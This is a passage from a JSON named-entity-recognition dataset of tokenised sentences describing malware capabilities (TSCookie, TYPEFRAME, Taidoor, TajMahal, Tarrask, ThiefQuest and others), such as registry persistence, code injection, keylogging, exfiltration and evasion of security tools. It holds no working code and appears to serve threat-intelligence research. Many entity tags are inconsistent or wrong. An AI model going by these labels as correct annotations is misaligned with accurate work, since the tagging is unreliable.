"TSCookie", "has", "the", "ability", "to", "upload", "and", "download", "files", "to", "and", "from", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "been", "executed", "via", "malicious", "links", "embedded", "in", "e-mails", "spoofing", "the", "Ministries", "of", "Education,", "Culture,", "Sports,", "Science", "and", "Technology", "of", "Japan." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Idus", "B-Idus", "B-Idus", "B-Idus", "O", "B-Idus", "O", "B-Area" ] }, { "tokens": [ "TSCookie", "can", "use", "ICMP", "to", "receive", "information", "on", "the", "destination", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "list", "processes", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "inject", "code", "into", "the", "svchost.exe,", "iexplorer.exe,", "explorer.exe,", "and", "default", "browser", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "B-Way", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "proxy", "communications", "with", "command", "and", "control", "(C2)", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "encrypted", "network", "communications", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "identify", "the", "IP", "of", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "can", "multiple", "protocols", "including", "HTTP", "and", "HTTPS", "in", "communication", "with", "command", "and", "control", "(C2)", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TSCookie", "has", "the", "ability", "to", "execute", "shell", "commands", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "injecting", "code", "into", "the", "APC", "queue", "of", "a", "created", "Rundll32", "process", "as", "part", "of", "an", "\"Early", "Bird", "injection.\"" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "I-Way", "O" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "downloading", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "writing", "to", "a", "Registry", "Run", "key", "to", "establish." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "taking", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "gathering", "system", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TURNEDUP", "is", "capable", "of", "creating", "a", "reverse", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "One", "TYPEFRAME", "variant", "decrypts", "an", "archive", "using", "an", "RC4", "key,", "then", "decompresses", "and", "installs", "the", "decrypted", "malicious", "DLL", "module.", "Another", "variant", "decodes", "the", "embedded", "file", "by", "XORing", "it", "with", "the", "value", "\"0x35\"." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "open", "the", "Windows", "Firewall", "on", "the", "victim’s", "machine", "to", "allow", "incoming", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APIs", "and", "strings", "in", "some", "TYPEFRAME", "variants", "are", "RC4", "encrypted.", "Another", "variant", "is", "encoded", "with", "XOR." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "delete", "files", "off", "the", "system." ], "ner_tags": [ "B-Idus", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "search", "directories", "for", "files", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "install", "and", "store", "encrypted", "configuration", "data", "under", "the", "Registry", "key", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", "and", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "TYPEFRAME", "can", "upload", "and", "download", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "A", "Word", "document", "delivering", "TYPEFRAME", "prompts", "the", "user", "to", "enable", "macro", "execution." ], "ner_tags": [ "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "install", "encrypted", "configuration", "data", "under", "the", "Registry", "key", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll</code>", "and", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "TYPEFRAME", "has", "used", "ports", "443,", "8080,", "and", "8443", "with", "a", "FakeTLS", "method." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "A", "TYPEFRAME", "variant", "can", "force", "the", "compromised", "system", "to", "function", "as", "a", "proxy", "server." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "gather", "the", "disk", "volume", "information." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "TYPEFRAME", "has", "used", "a", "malicious", "Word", "document", "for", "delivery", "with", "VBA", "macros", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TYPEFRAME", "can", "uninstall", "malware", "components", "using", "a", "batch", "script.", "TYPEFRAME", "can", "execute", "commands", "using", "a", "shell." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-HackOrg", "O", "O", "O", "I-Way", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "TYPEFRAME", "variants", "can", "add", "malicious", "DLL", "modules", "as", "new", "services.TYPEFRAME", "can", "also", "delete", "services", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "B-Features", "O", "O", "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "upload", "data", "and", "files", "from", "a", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "a", "stream", "cipher", "to", "decrypt", "stings", "used", "by", "the", "malware." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "perform", "DLL", "loading." ], "ner_tags": [ "B-Way", "O", "O", "B-HackOrg", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "encrypted", "string", "blocks", "for", "obfuscation." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "<code>DeleteFileA</code>", "to", "remove", "files", "from", "infected", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "search", "for", "specific", "files." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "Taidoor", "has", "downloaded", "additional", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "has", "relied", "upon", "a", "victim", "to", "click", "on", "a", "malicious", "email", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Taidoor", "has", "the", "ability", "to", "modify", "the", "Registry", "on", "compromised", "hosts", "using", "<code>RegDeleteValueA</code>", "and", "<code>RegCreateKeyExA</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Taidoor", "has", "the", "ability", "to", "use", "native", "APIs", "for", "execution", "including", "<code>GetProcessHeap</code>,", "<code>GetProcAddress</code>,", "and", "<code>LoadLibrary</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "TCP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "<code>GetCurrentProcessId</code>", "for", "process", "discovery." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "B-Features" ] }, { "tokens": [ "Taidoor", "can", "query", "the", "Registry", "on", "compromised", "hosts", "using", "<code>RegQueryValueExA</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "has", "modified", "the", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "key", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "has", "been", "delivered", "through", "spearphishing", "emails." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Taidoor", "uses", "RC4", "to", "encrypt", "the", "message", "body", "of", "HTTP", "content." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "has", "collected", "the", "MAC", "address", "of", "a", "compromised", "host;", "it", "can", "also", "use", "<code>GetAdaptersInfo</code>", "to", "identify", "network", "adapters." ], "ner_tags": [ "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "use", "<code>GetLocalTime</code>", "and", "<code>GetSystemTime</code>", "to", "collect", "system", "time." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "has", "used", "HTTP", "GET", "and", "POST", "requests", "for", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Taidoor", "can", "copy", "cmd.exe", "into", "the", "system", "temp", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "use", "the", "open", "source", "libraries", "XZip/Xunzip", "and", "zlib", "to", "compress", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "capture", "VoiceIP", "application", "audio", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "index", "and", "compress", "files", "into", "a", "send", "queue", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "manage", "an", "automated", "queue", "of", "egress", "files", "and", "commands", "sent", "to", "its", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "steal", "data", "from", "the", "clipboard", "of", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "steal", "documents", "from", "the", "local", "system", "including", "the", "print", "spooler", "queue." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "steal", "written", "CD", "images", "and", "files", "of", "interest", "from", "previously", "connected", "removable", "drives", "when", "they", "become", "available", "again." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "inject", "DLLs", "for", "malicious", "plugins", "into", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "send", "collected", "files", "over", "its", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "index", "files", "from", "drives,", "user", "profiles,", "and", "removable", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "capture", "keystrokes", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "can", "set", "the", "<code>KeepPrintedJobs</code>", "attribute", "for", "configured", "printers", "in", "<code>SOFTWARE\\\\Microsoft\\\\Windows", "NT\\\\CurrentVersion\\\\Print\\\\Printers</code>", "to", "enable", "document", "stealing." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "used", "an", "encrypted", "Virtual", "File", "System", "to", "store", "plugins." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "connected", "Apple", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Exp", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "running", "processes", "and", "associated", "plugins", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "take", "screenshots", "on", "an", "infected", "host", "including", "capturing", "content", "from", "windows", "of", "instant", "messaging", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "which", "anti-virus", "products,", "firewalls,", "and", "anti-spyware", "products", "are", "in", "use." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "inject", "the", "<code>LoadLibrary</code>", "call", "template", "DLL", "into", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "the", "Internet", "Explorer", "(IE)", "version", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "steal", "web", "session", "cookies", "from", "Internet", "Explorer,", "Netscape", "Navigator,", "FireFox", "and", "RealNetworks", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "hardware", "information,", "the", "computer", "name,", "and", "OS", "information", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "identify", "the", "MAC", "address", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "determine", "local", "time", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TajMahal", "has", "the", "ability", "to", "capture", "webcam", "video." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Tarrask", "is", "able", "to", "create", "“hidden”", "scheduled", "tasks", "by", "deleting", "the", "Security", "Descriptor", "(`SD`)", "registry", "value." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tarrask", "creates", "a", "scheduled", "task", "called", "“WinUpdate”", "to", "re-establish", "any", "dropped", "C2", "connections." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tarrask", "has", "masqueraded", "as", "executable", "files", "such", "as", "`winupdate.exe`,", "`date.exe`,", "or", "`win.exe`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "Tarrask", "is", "able", "to", "delete", "the", "Security", "Descriptor", "(`SD`)", "registry", "subkey", "in", "order", "to", "“hide”", "scheduled", "tasks." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tarrask", "is", "able", "to", "create", "“hidden”", "scheduled", "tasks", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tarrask", "leverages", "token", "theft", "to", "obtain", "`lsass.exe`", "security", "permissions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tarrask", "may", "abuse", "the", "Windows", "schtasks", "command-line", "tool", "to", "create", "\"hidden\"", "scheduled", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tasklist", "can", "be", "used", "to", "discover", "processes", "running", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Tasklist", "can", "be", "used", "to", "enumerate", "security", "software", "currently", "running", "on", "a", "system", "by", "process", "name", "of", "known", "products." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Tasklist", "can", "be", "used", "to", "discover", "services", "running", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "AppleScript's", "<code>osascript", "-e</code>", "command", "to", "launch", "ThiefQuest's", "persistence", "via", "Launch", "Agent", "and", "Launch", "Daemon." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "ThiefQuest", "searches", "through", "the", "<code>/Users/</code>", "folder", "looking", "for", "executable", "files.", "For", "each", "executable,", "ThiefQuest", "prepends", "a", "copy", "of", "itself", "to", "the", "beginning", "of", "the", "file.", "When", "the", "file", "is", "executed,", "the", "ThiefQuest", "code", "is", "executed", "first.", "ThiefQuest", "creates", "a", "hidden", "file,", "copies", "the", "original", "target", "executable", "to", "the", "file,", "then", "executes", "the", "new", "hidden", "file", "to", "maintain", "the", "appearance", "of", "normal", "behavior." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "encrypts", "a", "set", "of", "file", "extensions", "on", "a", "host,", "deletes", "the", "original", "files,", "and", "provides", "a", "ransom", "note", "with", "no", "contact", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "a", "function", "named", "<code>is_debugging</code>", "to", "perform", "anti-debugging", "logic.", "The", "function", "invokes", "<code>sysctl</code>", "checking", "the", "returned", "value", "of", "<code>P_TRACED</code>.", "ThiefQuest", "also", "calls", "<code>ptrace</code>", "with", "the", "<code>PTRACE_DENY_ATTACH</code>", "flag", "to", "prevent", "debugging." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "the", "function", "<code>kill_unwanted</code>", "to", "obtain", "a", "list", "of", "running", "processes", "and", "kills", "each", "process", "matching", "a", "list", "of", "security", "related", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "exfiltrates", "targeted", "file", "extensions", "in", "the", "<code>/Users/</code>", "folder", "to", "the", "command", "and", "control", "server", "via", "unencrypted", "HTTP.", "Network", "packets", "contain", "a", "string", "with", "two", "pieces", "of", "information:", "a", "file", "path", "and", "the", "contents", "of", "the", "file", "in", "a", "base64", "encoded", "string." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "hides", "a", "copy", "of", "itself", "in", "the", "user's", "<code>~/Library</code>", "directory", "by", "using", "a", "<code>.</code>", "at", "the", "beginning", "of", "the", "file", "name", "followed", "by", "9", "random", "characters." ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "can", "download", "and", "execute", "payloads", "in-memory", "or", "from", "disk." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "the", "<code>CGEventTap</code>", "functions", "to", "perform", "keylogging." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "installs", "a", "launch", "item", "using", "an", "embedded", "encrypted", "launch", "agent", "property", "list", "template.", "The", "plist", "file", "is", "installed", "in", "the", "<code>~/Library/LaunchAgents/</code>", "folder", "and", "configured", "with", "the", "path", "to", "the", "persistent", "binary", "located", "in", "the", "<code>~/Library/</code>", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "running", "with", "root", "privileges", "after", "a", "Launch", "Agent", "is", "installed,", "ThiefQuest", "installs", "a", "plist", "file", "to", "the", "<code>/Library/LaunchDaemons/</code>", "folder", "with", "the", "<code>RunAtLoad</code>", "key", "set", "to", "<code>true</code>", "establishing", "persistence", "as", "a", "Launch", "Daemon." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "ThiefQuest", "prepends", "a", "copy", "of", "itself", "to", "the", "beginning", "of", "an", "executable", "file", "while", "maintaining", "the", "name", "of", "the", "executable." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "various", "API", "to", "perform", "behaviors", "such", "as", "executing", "payloads", "and", "performing", "local", "enumeration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Way", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ThiefQuest", "obtains", "a", "list", "of", "running", "processes", "using", "the", "function", "<code>kill_unwanted</code>." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ThiefQuest", "uses", "various", "API", "functions", "such", "as", "<code>NSCreateObjectFileImageFromMemory</code>", "to", "load", "and", "link", "in-memory", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "uses", "the", "<code>kill_unwanted</code>", "function", "to", "get", "a", "list", "of", "running", "processes,", "compares", "each", "process", "with", "an", "encrypted", "list", "of", "“unwanted”", "security", "related", "programs,", "and", "kills", "the", "processes", "for", "security", "related", "programs." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ThiefQuest", "invokes", "<code>time</code>", "call", "to", "check", "the", "system's", "time,", "executes", "a", "<code>sleep</code>", "command,", "invokes", "a", "second", "<code>time</code>", "call,", "and", "then", "compares", "the", "time", "difference", "between", "the", "two", "<code>time</code>", "calls", "and", "the", "amount", "of", "time", "the", "system", "slept", "to", "identify", "the", "sandbox." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { 